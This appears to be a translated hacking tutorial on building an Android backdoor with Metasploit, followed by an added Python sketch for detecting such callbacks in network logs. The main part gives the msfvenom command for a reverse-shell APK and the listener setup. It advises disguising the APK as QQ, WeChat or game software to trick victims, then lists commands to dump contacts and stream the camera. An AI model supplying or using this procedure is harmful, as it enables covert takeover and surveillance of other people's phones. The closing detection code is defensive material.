1. Introduction to Metasploit and its listener module
2. The principle of mobile phone penetration
3. Create malware and obtain shell privileges
4. Hands-on practice: remote control
msf
Metasploit is a free, downloadable framework that makes it easy to obtain, develop, and run exploits for computer software vulnerabilities. It ships with professional-grade exploit tools for thousands of known software vulnerabilities. When HD Moore released Metasploit in 2003, the computer security landscape changed for good. Seemingly overnight, anyone could become a hacker, and everyone could use attack tools to exploit vulnerabilities that were unpatched or had only just been patched. Software vendors could no longer delay releasing patches for published vulnerabilities, because the Metasploit team was hard at work developing attack tools and contributing them to all Metasploit users.
When we cannot get past the other side's network boundary, we often need to take the initiative to attack, for example by sending an APK containing a backdoor, or a Word document, PDF file, etc., to the target mobile phone. For this to have any effect, we must also make good use of social engineering to trick victims into executing the malicious program.
Hackers tailor these active attacks to different groups of people, for example by bundling the backdoor with popular software, or with online game plug-ins or their patches, and then uploading the result to the Internet for people to download. The backdoor can also be disguised as a QQ or WeChat installer and offered to those looking for one.
msfvenom combines msfpayload and msfencode. It generates a Trojan horse program that is executed on the target machine while a listener runs locally.
start
Generate an Android backdoor
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 > shell.apk
Start the listener in msf
* use exploit/multi/handler
* set payload android/meterpreter/reverse_tcp
* set lhost 192.168.1.10
* set lport 4444
* run
In Kali, start a web server in the directory where the apk backdoor is located: python -m SimpleHTTPServer
Visit the URL in the Android browser to download the apk
A session will be established in msf
Run commands in the session:
* sysinfo: view the system information
* app_list: list the installed apps
* check_root: detect whether the system is rooted
* dump_contacts: download the address book information
* webcam_list: obtain the camera information
* webcam_stream: open the camera
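Seen from the network, the procedure above leaves a recognisable trace: a device fetches an .apk over plain HTTP from an ad-hoc server, then opens a TCP connection back to the same host on a different, non-web port. The following detection sketch is an added example, not part of the original page; the log format, the client addresses, the 203.0.113.x and 192.168.1.77 hosts and the 10-minute correlation window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events: normalised proxy ("http") and firewall ("conn") records.
# Fields: timestamp kind client server:port [method path Server=<header>]
EVENTS = """\
2024-05-01T10:00:05 http 10.0.0.23 192.168.1.10:8000 GET /shell.apk Server=SimpleHTTP/0.6
2024-05-01T10:01:40 conn 10.0.0.23 192.168.1.10:4444
2024-05-01T10:02:00 http 10.0.0.31 203.0.113.5:80 GET /app.apk Server=nginx
2024-05-01T10:30:00 conn 10.0.0.31 203.0.113.5:443
2024-05-01T11:00:00 http 10.0.0.40 192.168.1.77:8000 GET /game.apk Server=SimpleHTTP/0.6
2024-05-01T12:30:00 conn 10.0.0.40 192.168.1.77:5555
"""

WINDOW = timedelta(minutes=10)   # assumed correlation window
WEB_PORTS = {80, 443}            # callbacks to ordinary web ports are ignored here

def parse(line):
    ts, kind, client, server, *rest = line.split()
    host, port = server.rsplit(":", 1)
    return datetime.fromisoformat(ts), kind, client, host, int(port), rest

def find_callbacks(log_text):
    """Flag an .apk download followed by a non-web connection to the same host.

    Events are assumed to be in chronological order.
    """
    downloads = {}  # (client, server host) -> [(time, port, path, adhoc_server)]
    alerts = []
    for line in filter(str.strip, log_text.splitlines()):
        ts, kind, client, host, port, rest = parse(line)
        if kind == "http" and len(rest) >= 2 and rest[1].lower().endswith(".apk"):
            # Python's built-in file server identifies itself as SimpleHTTP/x.y
            adhoc = any(f.startswith("Server=SimpleHTTP/") for f in rest)
            downloads.setdefault((client, host), []).append((ts, port, rest[1], adhoc))
        elif kind == "conn" and port not in WEB_PORTS:
            for d_ts, d_port, path, adhoc in downloads.get((client, host), []):
                if port != d_port and timedelta(0) <= ts - d_ts <= WINDOW:
                    alerts.append({"client": client, "server": host, "apk": path,
                                   "callback_port": port,
                                   "severity": "high" if adhoc else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(EVENTS):
        print(alert)
```

Only the first pair of events is flagged: the second client connects back on a web port, and the third connects long after the correlation window has closed.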